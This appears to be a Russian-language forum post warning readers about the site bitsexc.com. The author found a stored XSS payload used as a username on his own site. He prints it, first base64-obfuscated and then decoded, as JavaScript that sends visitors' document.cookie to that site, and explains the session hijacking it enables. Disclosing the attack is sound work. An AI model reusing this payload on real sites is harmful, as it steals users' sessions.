Хочу предостеречь новичков и не только от того, чтобы вводить какие-либо данные на сайте
https://bitsexc.com/Этот сайт принадлежит хакерам или контролируется ими!
Обнаружил я это по тому, как на моем сайте зарегистрировался пользователь с интересным именем:
<code class="html"><script>eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw=='));</script></code>
Странное имя для пользователя подумал я и попробовал расшифровать строчку "dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x
1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaG
lsZChpbWcpOw==". К счастью для расшифровки достаточно скопастить ее например на этом сайте
https://www.base64decode.net/ (пункт Base64 decode)
Вот что там написано:
var img = new Image(0,0); img.src='https://bitsexc.com/includes/send.php?c=' + document.cookie; document.body.appendChild(img);
Если внезапно не все владеют яваскриптом, то перевожу на русский:
Хакер хотел чтобы все, кто заходит на страницу на которой показывается его имя пользователя, автоматически отправляли на сайт bitsexc.com данные о своей сессии-авторизаци. Дальще с этими данными хакер мог бы логиниться от имени других пользователей без пароля.